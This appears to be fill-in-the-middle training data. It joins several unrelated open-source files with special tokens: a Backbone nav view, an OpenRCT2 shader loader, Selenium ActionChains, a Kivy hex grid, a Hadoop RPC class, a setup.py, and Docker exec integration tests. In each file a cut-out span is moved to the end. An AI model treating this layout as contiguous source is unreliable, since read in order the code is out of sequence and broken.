lang: lang
}))
this.$navLis = this.$('.js-li')
this.setActivePage()
this.listenTo(options.router, 'route', this.setActivePage)
return this
},
setActivePage: function () {
var pathname = window.location.pathname
this.$navLis.removeClass('active')
this.$('.js-nav').each(function (index, value) {
var $this = $(this)
var href = $this.attr('href')
if(href === '/') {
if(pathname === '/')
$this.parent().addClass('active')
}
else {
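// Escape regex metacharacters in href so the path prefix is matched literally.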
if(href && pathname.match(new RegExp('^' + href.replace(/[-\/\\^$*+?.()|[\]{}]/g, '\\$&')))) {
$this.parent().addClass('active')
}
}
})
},
navigate: function (e) {
e.preventDefault()
this.$('.navbar-collapse').removeClass('in')
Backbone.history.navigate($(e.target).attr('href'), {
trigger: true,
replace: false
})
}
})<|fim▁end|> | |
<|file_name|>OpenGLShaderProgram.cpp<|end_file_name|><|fim▁begin|>#pragma region Copyright (c) 2014-2017 OpenRCT2 Developers
/*****************************************************************************
* OpenRCT2, an open source clone of Roller Coaster Tycoon 2.
*
* OpenRCT2 is the work of many authors, a full list can be found in contributors.md
* For more information, visit https://github.com/OpenRCT2/OpenRCT2
*
* OpenRCT2 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* A full copy of the GNU General Public License can be found in licence.txt
*****************************************************************************/
#pragma endregion
#ifndef DISABLE_OPENGL
#include <openrct2/Context.h>
#include <openrct2/core/Console.hpp>
#include <openrct2/core/FileStream.hpp>
#include <openrct2/core/Path.hpp>
#include <openrct2/core/String.hpp>
#include <openrct2/PlatformEnvironment.h>
#include "OpenGLShaderProgram.h"
using namespace OpenRCT2;
OpenGLShader::OpenGLShader(const char * name, GLenum type)
{
_type = type;
auto path = GetPath(name);
auto sourceCode = ReadSourceCode(path);
auto sourceCodeStr = sourceCode.c_str();
_id = glCreateShader(type);
glShaderSource(_id, 1, (const GLchar **)&sourceCodeStr, nullptr);
glCompileShader(_id);
GLint status;
glGetShaderiv(_id, GL_COMPILE_STATUS, &status);
if (status != GL_TRUE)
{
char buffer[512];
glGetShaderInfoLog(_id, sizeof(buffer), nullptr, buffer);
glDeleteShader(_id);
Console::Error::WriteLine("Error compiling %s", path.c_str());
Console::Error::WriteLine(buffer);
throw std::runtime_error("Error compiling shader.");
}
}
OpenGLShader::~OpenGLShader()
{
glDeleteShader(_id);
}
GLuint OpenGLShader::GetShaderId()
{
return _id;
}
std::string OpenGLShader::GetPath(const std::string &name)
{
auto env = GetContext()->GetPlatformEnvironment();
auto shadersPath = env->GetDirectoryPath(DIRBASE::OPENRCT2, DIRID::SHADER);
auto path = Path::Combine(shadersPath, name);
if (_type == GL_VERTEX_SHADER)
{
path += ".vert";
}
else
{
path += ".frag";
}
return path;
}
std::string OpenGLShader::ReadSourceCode(const std::string &path)
{
auto fs = FileStream(path, FILE_MODE_OPEN);
uint64 fileLength = fs.GetLength();
if (fileLength > MaxSourceSize)
{
throw IOException("Shader source too large.");
}
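// One extra byte keeps the buffer NUL-terminated for use as a C string.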
auto fileData = std::string((size_t)fileLength + 1, '\0');
fs.Read((void *)fileData.data(), fileLength);
return fileData;
}
OpenGLShaderProgram::OpenGLShaderProgram(const char * name)
{
_vertexShader = new OpenGLShader(name, GL_VERTEX_SHADER);
_fragmentShader = new OpenGLShader(name, GL_FRAGMENT_SHADER);
_id = glCreateProgram();
glAttachShader(_id, _vertexShader->GetShaderId());
glAttachShader(_id, _fragmentShader->GetShaderId());
glBindFragDataLocation(_id, 0, "oColour");
if (!Link())
{
char buffer[512];
GLsizei length;
glGetProgramInfoLog(_id, sizeof(buffer), &length, buffer);
Console::Error::WriteLine("Error linking %s", name);
Console::Error::WriteLine(buffer);
throw std::runtime_error("Failed to link OpenGL shader.");
}
}
OpenGLShaderProgram::~OpenGLShaderProgram()
{
if (_vertexShader != nullptr)
{<|fim▁hole|> delete _vertexShader;
}
if (_fragmentShader != nullptr)
{
glDetachShader(_id, _fragmentShader->GetShaderId());
delete _fragmentShader;
}
glDeleteProgram(_id);
}
GLuint OpenGLShaderProgram::GetAttributeLocation(const char * name)
{
return glGetAttribLocation(_id, name);
}
GLuint OpenGLShaderProgram::GetUniformLocation(const char * name)
{
return glGetUniformLocation(_id, name);
}
void OpenGLShaderProgram::Use()
{
if (OpenGLState::CurrentProgram != _id)
{
OpenGLState::CurrentProgram = _id;
glUseProgram(_id);
}
}
bool OpenGLShaderProgram::Link()
{
glLinkProgram(_id);
GLint linkStatus;
glGetProgramiv(_id, GL_LINK_STATUS, &linkStatus);
return linkStatus == GL_TRUE;
}
#endif /* DISABLE_OPENGL */<|fim▁end|> | glDetachShader(_id, _vertexShader->GetShaderId()); |
<|file_name|>action_chains.py<|end_file_name|><|fim▁begin|># Copyright 2011 WebDriver committers
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The ActionChains implementation."""
from selenium.webdriver.remote.command import Command
class ActionChains(object):
"""Generate user actions.
All actions are stored in the ActionChains object. Call perform() to fire
stored actions."""
def __init__(self, driver):
"""Creates a new ActionChains.
Args:
driver: The WebDriver instance which performs user actions.
"""
self._driver = driver
self._actions = []
def perform(self):
"""Performs all stored actions."""
for action in self._actions:
action()
def click(self, on_element=None):
"""Clicks an element.
Args:
on_element: The element to click.
If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.CLICK, {'button': 0}))
return self
def click_and_hold(self, on_element):
"""Holds down the left mouse button on an element.
Args:
on_element: The element to mouse down.
If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.MOUSE_DOWN, {}))
return self
def context_click(self, on_element):
"""Performs a context-click (right click) on an element.
Args:
on_element: The element to context-click.
If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.CLICK, {'button': 2}))
return self
def double_click(self, on_element):
"""Double-clicks an element.
Args:
on_element: The element to double-click.<|fim▁hole|> self._driver.execute(Command.DOUBLE_CLICK, {}))
return self
def drag_and_drop(self, source, target):
"""Holds down the left mouse button on the source element,
then moves to the target element and releases the mouse button.
Args:
source: The element to mouse down.
target: The element to mouse up.
"""
self.click_and_hold(source)
self.release(target)
return self
def drag_and_drop_by_offset(self, source, xoffset, yoffset):
"""Holds down the left mouse button on the source element,
then moves to the target element and releases the mouse button.
Args:
source: The element to mouse down.
xoffset: X offset to move to.
yoffset: Y offset to move to.
"""
self.click_and_hold(source)
self.move_by_offset(xoffset, yoffset)
self.release(source)
return self
def key_down(self, key, element=None):
"""Sends a key press only, without releasing it.
Should only be used with modifier keys (Control, Alt and Shift).
Args:
key: The modifier key to send. Values are defined in Keys class.
target: The element to send keys.
If None, sends a key to current focused element.
"""
if element: self.click(element)
self._actions.append(lambda:
self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
"value": key,
"isdown": True}))
return self
def key_up(self, key, element=None):
"""Releases a modifier key.
Args:
key: The modifier key to send. Values are defined in Keys class.
target: The element to send keys.
If None, sends a key to current focused element.
"""
if element: self.click(element)
self._actions.append(lambda:
self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
"value": key,
"isdown": False}))
return self
def move_by_offset(self, xoffset, yoffset):
"""Moving the mouse to an offset from current mouse position.
Args:
xoffset: X offset to move to.
yoffset: Y offset to move to.
"""
self._actions.append(lambda:
self._driver.execute(Command.MOVE_TO, {
'xoffset': xoffset,
'yoffset': yoffset}))
return self
def move_to_element(self, to_element):
"""Moving the mouse to the middle of an element.
Args:
to_element: The element to move to.
"""
self._actions.append(lambda:
self._driver.execute(Command.MOVE_TO, {'element': to_element.id}))
return self
def move_to_element_with_offset(self, to_element, xoffset, yoffset):
"""Move the mouse by an offset of the specificed element.
Offsets are relative to the top-left corner of the element.
Args:
to_element: The element to move to.
xoffset: X offset to move to.
yoffset: Y offset to move to.
"""
self._actions.append(lambda:
self._driver.execute(Command.MOVE_TO, {
'element': to_element.id,
'xoffset': xoffset,
'yoffset': yoffset}))
return self
def release(self, on_element):
"""Releasing a held mouse button.
Args:
on_element: The element to mouse up.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.MOUSE_UP, {}))
return self
def send_keys(self, *keys_to_send):
"""Sends keys to current focused element.
Args:
keys_to_send: The keys to send.
"""
self._actions.append(lambda:
self._driver.switch_to_active_element().send_keys(*keys_to_send))
return self
def send_keys_to_element(self, element, *keys_to_send):
"""Sends keys to an element.
Args:
element: The element to send keys.
keys_to_send: The keys to send.
"""
self._actions.append(lambda:
element.send_keys(*keys_to_send))
return self<|fim▁end|> | If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda: |
<|file_name|>hexcanvas.py<|end_file_name|><|fim▁begin|>from kivy.uix.floatlayout import FloatLayout
from kivy.properties import NumericProperty, ObjectProperty, BoundedNumericProperty, ListProperty
from .node import Node
from math import sqrt
class HexCanvas(FloatLayout):
last_node = ObjectProperty(None, allownone=True)
grid = ObjectProperty([])
row_count = BoundedNumericProperty(11, min=0, max=11)
column_count = BoundedNumericProperty(22, min=0, max=22)
vvhelix_id = NumericProperty(0)
scaffold_path = ListProperty([])
"""docstring for NanoCanvas"""
def __init__(self, **kwargs):
#super(HexCanvas, self).__init__(**kwargs)
super().__init__(**kwargs)
self.__construct()
def __construct(self):
x_start, y_start = 30, 30
a = 60
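# Offset hex layout: rows sit a*sqrt(3)/2 apart vertically and every other row
# shifts right by a/2, placing node centers on a hexagonal lattice of pitch a.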
x_offset = a / 2<|fim▁hole|> if j % 2 != 0:
offset = x_offset
else:
offset = 0
x = x_start + offset
for i in range(self.column_count):
node = Node(pos=(x, y), grid_id=(j, i))
row.append(node)
self.add_widget(node)
x += a
y += y_offset
self.grid.append(row)
def clean(self):
# TODO remove vhelixes and other stuff !!!
self.last_node = None
# for row in self.grid:
# for node in row:
# del node
self.grid = []
self.vvhelix_id = 0
self.scaffold_path = []
self.__construct()<|fim▁end|> | y_offset = a * sqrt(3) / 2
y = y_start
for j in range(self.row_count):
row = [] |
<|file_name|>RpcMessage.java<|end_file_name|><|fim▁begin|>/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.oncrpc;
/**
* Represent an RPC message as defined in RFC 1831.<|fim▁hole|> public static enum Type {
// the order of the values below are significant.
RPC_CALL,
RPC_REPLY;
public int getValue() {
return ordinal();
}
public static Type fromValue(int value) {
if (value < 0 || value >= values().length) {
return null;
}
return values()[value];
}
}
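// Note: ordinal() ties RPC_CALL to 0 and RPC_REPLY to 1, matching the
// msg_type discriminant in RFC 1831; fromValue() yields null when the
// decoded discriminant is out of range.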
protected final int xid;
protected final Type messageType;
RpcMessage(int xid, Type messageType) {
if (messageType != Type.RPC_CALL && messageType != Type.RPC_REPLY) {
throw new IllegalArgumentException("Invalid message type " + messageType);
}
this.xid = xid;
this.messageType = messageType;
}
public abstract XDR write(XDR xdr);
public int getXid() {
return xid;
}
public Type getMessageType() {
return messageType;
}
protected void validateMessageType(Type expected) {
if (expected != messageType) {
throw new IllegalArgumentException("Message type is expected to be "
+ expected + " but got " + messageType);
}
}
}<|fim▁end|> | */
public abstract class RpcMessage {
/** Message type */ |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
from setuptools import setup, find_packages
setup(<|fim▁hole|> author='Giuseppe Lavagetto',
author_email='[email protected]',
url='https://github.com/lavagetto/plumber',
install_requires=['argparse', 'Flask', 'jinja2'],
setup_requires=[],
zip_safe=True,
packages=find_packages(),
entry_points={
'console_scripts': [
'plumber-run = plumber.main:run',
],
},
)<|fim▁end|> | name='plumber',
version='0.0.1-alpha',
description='simple, mundane script to build and publish containers to marathon/mesos', |
<|file_name|>docker_cli_exec_test.go<|end_file_name|><|fim▁begin|>// +build !test_no_exec
package main
import (
"bufio"
"fmt"
"net/http"
"os"
"os/exec"
"path/filepath"
"reflect"
"sort"
"strings"
"sync"
"time"
"github.com/docker/docker/pkg/integration/checker"
"github.com/go-check/check"
)
func (s *DockerSuite) TestExec(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top")
out, _ := dockerCmd(c, "exec", "testing", "cat", "/tmp/file")
out = strings.Trim(out, "\r\n")
if out != "test" {
c.Errorf("container exec should've printed test but printed %q", out)
}
}
func (s *DockerSuite) TestExecInteractive(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top")
execCmd := exec.Command(dockerBinary, "exec", "-i", "testing", "sh")
stdin, err := execCmd.StdinPipe()
if err != nil {
c.Fatal(err)
}
stdout, err := execCmd.StdoutPipe()
if err != nil {
c.Fatal(err)
}
if err := execCmd.Start(); err != nil {
c.Fatal(err)
}
if _, err := stdin.Write([]byte("cat /tmp/file\n")); err != nil {
c.Fatal(err)
}
r := bufio.NewReader(stdout)
line, err := r.ReadString('\n')
if err != nil {
c.Fatal(err)
}
line = strings.TrimSpace(line)
if line != "test" {
c.Fatalf("Output should be 'test', got '%q'", line)
}
if err := stdin.Close(); err != nil {
c.Fatal(err)
}
errChan := make(chan error)
go func() {
errChan <- execCmd.Wait()
close(errChan)
}()
select {
case err := <-errChan:
c.Assert(err, check.IsNil)
case <-time.After(1 * time.Second):
c.Fatal("docker exec failed to exit on stdin close")
}
}
func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) {
testRequires(c, DaemonIsLinux)
out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
cleanedContainerID := strings.TrimSpace(out)
dockerCmd(c, "restart", cleanedContainerID)
out, _ = dockerCmd(c, "exec", cleanedContainerID, "echo", "hello")
outStr := strings.TrimSpace(out)
if outStr != "hello" {
c.Errorf("container should've printed hello, instead printed %q", outStr)
}
}
func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) {
testRequires(c, DaemonIsLinux)
testRequires(c, SameHostDaemon)
if err := s.d.StartWithBusybox(); err != nil {
c.Fatalf("Could not start daemon with busybox: %v", err)
}
if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil {
c.Fatalf("Could not run top: err=%v\n%s", err, out)
}
if err := s.d.Restart(); err != nil {
c.Fatalf("Could not restart daemon: %v", err)
}
if out, err := s.d.Cmd("start", "top"); err != nil {
c.Fatalf("Could not start top after daemon restart: err=%v\n%s", err, out)
}
out, err := s.d.Cmd("exec", "top", "echo", "hello")
if err != nil {
c.Fatalf("Could not exec on container top: err=%v\n%s", err, out)
}
outStr := strings.TrimSpace(string(out))
if outStr != "hello" {
c.Errorf("container should've printed hello, instead printed %q", outStr)
}
}
// Regression test for #9155, #9044
func (s *DockerSuite) TestExecEnv(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-e", "LALA=value1", "-e", "LALA=value2",
"-d", "--name", "testing", "busybox", "top")
out, _ := dockerCmd(c, "exec", "testing", "env")
if strings.Contains(out, "LALA=value1") ||
!strings.Contains(out, "LALA=value2") ||
!strings.Contains(out, "HOME=/root") {
c.Errorf("exec env(%q), expect %q, %q", out, "LALA=value2", "HOME=/root")
}
}
func (s *DockerSuite) TestExecExitStatus(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top")
// Test normal (non-detached) case first
cmd := exec.Command(dockerBinary, "exec", "top", "sh", "-c", "exit 23")
ec, _ := runCommand(cmd)
if ec != 23 {
c.Fatalf("Should have had an ExitCode of 23, not: %d", ec)
}
}
func (s *DockerSuite) TestExecPausedContainer(c *check.C) {
testRequires(c, DaemonIsLinux)
defer unpauseAllContainers()
out, _ := dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
ContainerID := strings.TrimSpace(out)
dockerCmd(c, "pause", "testing")
out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello")
if err == nil {
c.Fatal("container should fail to exec new command if it is paused")
}
expected := ContainerID + " is paused, unpause the container before exec"
if !strings.Contains(out, expected) {
c.Fatal("container should not exec new command if it is paused")
}
}
// regression test for #9476
func (s *DockerSuite) TestExecTtyCloseStdin(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "-it", "--name", "exec_tty_stdin", "busybox")
cmd := exec.Command(dockerBinary, "exec", "-i", "exec_tty_stdin", "cat")
stdinRw, err := cmd.StdinPipe()
if err != nil {
c.Fatal(err)
}
stdinRw.Write([]byte("test"))
stdinRw.Close()
if out, _, err := runCommandWithOutput(cmd); err != nil {
c.Fatal(out, err)
}
out, _ := dockerCmd(c, "top", "exec_tty_stdin")
outArr := strings.Split(out, "\n")
if len(outArr) > 3 || strings.Contains(out, "nsenter-exec") {
c.Fatalf("exec process left running\n\t %s", out)
}
}
func (s *DockerSuite) TestExecTtyWithoutStdin(c *check.C) {
testRequires(c, DaemonIsLinux)
out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox")
id := strings.TrimSpace(out)
c.Assert(waitRun(id), check.IsNil)
errChan := make(chan error)
go func() {
defer close(errChan)
cmd := exec.Command(dockerBinary, "exec", "-ti", id, "true")
if _, err := cmd.StdinPipe(); err != nil {
errChan <- err
return
}
expected := "cannot enable tty mode"
if out, _, err := runCommandWithOutput(cmd); err == nil {
errChan <- fmt.Errorf("exec should have failed")
return
} else if !strings.Contains(out, expected) {
errChan <- fmt.Errorf("exec failed with error %q: expected %q", out, expected)
return
}
}()
select {
case err := <-errChan:
c.Assert(err, check.IsNil)
case <-time.After(3 * time.Second):
c.Fatal("exec is running but should have failed")
}
}
func (s *DockerSuite) TestExecParseError(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top")
// Test normal (non-detached) case first
cmd := exec.Command(dockerBinary, "exec", "top")
if _, stderr, code, err := runCommandWithStdoutStderr(cmd); err == nil || !strings.Contains(stderr, "See '"+dockerBinary+" exec --help'") || code == 0 {
c.Fatalf("Should have thrown error & point to help: %s", stderr)
}
}
func (s *DockerSuite) TestExecStopNotHanging(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
if err := exec.Command(dockerBinary, "exec", "testing", "top").Start(); err != nil {
c.Fatal(err)
}
type dstop struct {
out []byte
err error
}
ch := make(chan dstop)
go func() {
out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput()
ch <- dstop{out, err}
close(ch)
}()
select {
case <-time.After(3 * time.Second):
c.Fatal("Container stop timed out")
case s := <-ch:
c.Assert(s.err, check.IsNil)
}
}
func (s *DockerSuite) TestExecCgroup(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
out, _ := dockerCmd(c, "exec", "testing", "cat", "/proc/1/cgroup")
containerCgroups := sort.StringSlice(strings.Split(out, "\n"))
var wg sync.WaitGroup
var mu sync.Mutex
execCgroups := []sort.StringSlice{}
errChan := make(chan error)
// exec a few times concurrently to get consistent failure
for i := 0; i < 5; i++ {
wg.Add(1)
go func() {
out, _, err := dockerCmdWithError("exec", "testing", "cat", "/proc/self/cgroup")
if err != nil {
errChan <- err
return
}
cg := sort.StringSlice(strings.Split(out, "\n"))
mu.Lock()
execCgroups = append(execCgroups, cg)
mu.Unlock()
wg.Done()
}()
}
wg.Wait()
close(errChan)
for err := range errChan {
c.Assert(err, check.IsNil)
}
for _, cg := range execCgroups {
if !reflect.DeepEqual(cg, containerCgroups) {
fmt.Println("exec cgroups:")
for _, name := range cg {
fmt.Printf(" %s\n", name)
}
fmt.Println("container cgroups:")
for _, name := range containerCgroups {
fmt.Printf(" %s\n", name)
}
c.Fatal("cgroups mismatched")
}
}
}
func (s *DockerSuite) TestInspectExecID(c *check.C) {
testRequires(c, DaemonIsLinux)
out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
id := strings.TrimSuffix(out, "\n")
out, err := inspectField(id, "ExecIDs")
if err != nil {
c.Fatalf("failed to inspect container: %s, %v", out, err)
}
if out != "[]" {
c.Fatalf("ExecIDs should be empty, got: %s", out)
}
// Start an exec, have it block waiting so we can do some checking
cmd := exec.Command(dockerBinary, "exec", id, "sh", "-c",
"while ! test -e /tmp/execid1; do sleep 1; done")
if err = cmd.Start(); err != nil {
c.Fatalf("failed to start the exec cmd: %q", err)
}
// Give the exec 10 chances/seconds to start then give up and stop the test
tries := 10
for i := 0; i < tries; i++ {
// Since its still running we should see exec as part of the container
out, err = inspectField(id, "ExecIDs")
if err != nil {
c.Fatalf("failed to inspect container: %s, %v", out, err)
}
out = strings.TrimSuffix(out, "\n")
if out != "[]" && out != "<no value>" {
break
}
if i+1 == tries {
c.Fatalf("ExecIDs should not be empty, got: %s", out)
}
time.Sleep(1 * time.Second)
}
// Save execID for later
execID, err := inspectFilter(id, "index .ExecIDs 0")
if err != nil {
c.Fatalf("failed to get the exec id: %v", err)
}
// End the exec by creating the missing file
err = exec.Command(dockerBinary, "exec", id,
"sh", "-c", "touch /tmp/execid1").Run()
if err != nil {
c.Fatalf("failed to run the 2nd exec cmd: %q", err)
}
// Wait for 1st exec to complete
cmd.Wait()
// All execs for the container should be gone now
out, err = inspectField(id, "ExecIDs")
if err != nil {
c.Fatalf("failed to inspect container: %s, %v", out, err)
}
out = strings.TrimSuffix(out, "\n")
if out != "[]" && out != "<no value>" {
c.Fatalf("ExecIDs should be empty, got: %s", out)
}
// But we should still be able to query the execID
sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil)
if sc != http.StatusOK {
c.Fatalf("received status != 200 OK: %d\n%s", sc, body)
}
// Now delete the container and then an 'inspect' on the exec should
// result in a 404 (not 'container not running')
out, ec := dockerCmd(c, "rm", "-f", id)
if ec != 0 {
c.Fatalf("error removing container: %s", out)
}
sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil)
if sc != http.StatusNotFound {
c.Fatalf("received status != 404: %d\n%s", sc, body)
}
}
func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) {
testRequires(c, DaemonIsLinux)
var out string
out, _ = dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
idA := strings.TrimSpace(out)
if idA == "" {
c.Fatal(out, "id should not be nil")
}
out, _ = dockerCmd(c, "run", "-d", "--link", "container1:alias1", "--name", "container2", "busybox", "top")
idB := strings.TrimSpace(out)
if idB == "" {
c.Fatal(out, "id should not be nil")
}
dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1")
dockerCmd(c, "rename", "container1", "container_new")
dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1")
}
func (s *DockerSuite) TestRunExecDir(c *check.C) {
testRequires(c, SameHostDaemon)
out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
id := strings.TrimSpace(out)
execDir := filepath.Join(execDriverPath, id)
stateFile := filepath.Join(execDir, "state.json")
{
fi, err := os.Stat(execDir)
if err != nil {
c.Fatal(err)
}
if !fi.IsDir() {
c.Fatalf("%q must be a directory", execDir)
}
fi, err = os.Stat(stateFile)
if err != nil {
c.Fatal(err)
}
}
dockerCmd(c, "stop", id)
{
_, err := os.Stat(execDir)
if err == nil {
c.Fatal(err)
}
if err == nil {
c.Fatalf("Exec directory %q exists for removed container!", execDir)
}
if !os.IsNotExist(err) {
c.Fatalf("Error should be about non-existing, got %s", err)
}
}
dockerCmd(c, "start", id)
{
fi, err := os.Stat(execDir)
if err != nil {
c.Fatal(err)
}
if !fi.IsDir() {
c.Fatalf("%q must be a directory", execDir)
}
fi, err = os.Stat(stateFile)
if err != nil {
c.Fatal(err)
}
}
dockerCmd(c, "rm", "-f", id)
{
_, err := os.Stat(execDir)
if err == nil {
c.Fatal(err)
}
if err == nil {
c.Fatalf("Exec directory %q is exists for removed container!", execDir)
}
if !os.IsNotExist(err) {
c.Fatalf("Error should be about non-existing, got %s", err)
}
}
}
func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) {
testRequires(c, SameHostDaemon)
for _, fn := range []string{"resolv.conf", "hosts"} {
deleteAllContainers()
content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn)))
if err != nil {
c.Fatal(err)
}
if strings.TrimSpace(string(content)) != "success" {
c.Fatal("Content was not what was modified in the container", string(content))
}
out, _ := dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top")
contID := strings.TrimSpace(out)
netFilePath := containerStorageFile(contID, fn)
f, err := os.OpenFile(netFilePath, os.O_WRONLY|os.O_SYNC|os.O_APPEND, 0644)<|fim▁hole|> if err != nil {
c.Fatal(err)
}
if _, err := f.Seek(0, 0); err != nil {
f.Close()
c.Fatal(err)
}
if err := f.Truncate(0); err != nil {
f.Close()
c.Fatal(err)
}
if _, err := f.Write([]byte("success2\n")); err != nil {
f.Close()
c.Fatal(err)
}
f.Close()
res, _ := dockerCmd(c, "exec", contID, "cat", "/etc/"+fn)
if res != "success2\n" {
c.Fatalf("Expected content of %s: %q, got: %q", fn, "success2\n", res)
}
}
}
func (s *DockerSuite) TestExecWithUser(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top")
out, _ := dockerCmd(c, "exec", "-u", "1", "parent", "id")
if !strings.Contains(out, "uid=1(daemon) gid=1(daemon)") {
c.Fatalf("exec with user by id expected daemon user got %s", out)
}
out, _ = dockerCmd(c, "exec", "-u", "root", "parent", "id")
if !strings.Contains(out, "uid=0(root) gid=0(root)") {
c.Fatalf("exec with user by root expected root user got %s", out)
}
}
func (s *DockerSuite) TestExecWithPrivileged(c *check.C) {
testRequires(c, DaemonIsLinux)
// Start main loop which attempts mknod repeatedly
dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`)
// Check exec mknod doesn't work
cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16")
out, _, err := runCommandWithOutput(cmd)
if err == nil || !strings.Contains(out, "Operation not permitted") {
c.Fatalf("exec mknod in --cap-drop=ALL container without --privileged should fail")
}
// Check exec mknod does work with --privileged
cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`)
out, _, err = runCommandWithOutput(cmd)
if err != nil {
c.Fatal(err, out)
}
if actual := strings.TrimSpace(out); actual != "ok" {
c.Fatalf("exec mknod in --cap-drop=ALL container with --privileged failed: %v, output: %q", err, out)
}
// Check subsequent unprivileged exec cannot mknod
cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32")
out, _, err = runCommandWithOutput(cmd)
if err == nil || !strings.Contains(out, "Operation not permitted") {
c.Fatalf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")
}
// Confirm at no point was mknod allowed
logCmd := exec.Command(dockerBinary, "logs", "parent")
if out, _, err := runCommandWithOutput(logCmd); err != nil || strings.Contains(out, "Success") {
c.Fatal(out, err)
}
}
func (s *DockerSuite) TestExecWithImageUser(c *check.C) {
testRequires(c, DaemonIsLinux)
name := "testbuilduser"
_, err := buildImage(name,
`FROM busybox
RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
USER dockerio`,
true)
if err != nil {
c.Fatalf("Could not build image %s: %v", name, err)
}
dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top")
out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami")
if !strings.Contains(out, "dockerio") {
c.Fatalf("exec with user by id expected dockerio user got %s", out)
}
}
func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--read-only", "--name", "parent", "busybox", "top")
if _, status := dockerCmd(c, "exec", "parent", "true"); status != 0 {
c.Fatalf("exec into a read-only container failed with exit status %d", status)
}
}
// #15750
// TODO Fix this test on windows #16738
func (s *DockerSuite) TestExecStartFails(c *check.C) {
testRequires(c, DaemonIsLinux, SameHostDaemon)
name := "exec-15750"
dockerCmd(c, "run", "-d", "--name", name, "busybox", "top")
c.Assert(waitRun(name), check.IsNil)
out, _, err := dockerCmdWithError("exec", name, "no-such-cmd")
c.Assert(err, check.NotNil, check.Commentf(out))
c.Assert(out, checker.Contains, "executable file not found")
}<|fim▁end|> | |
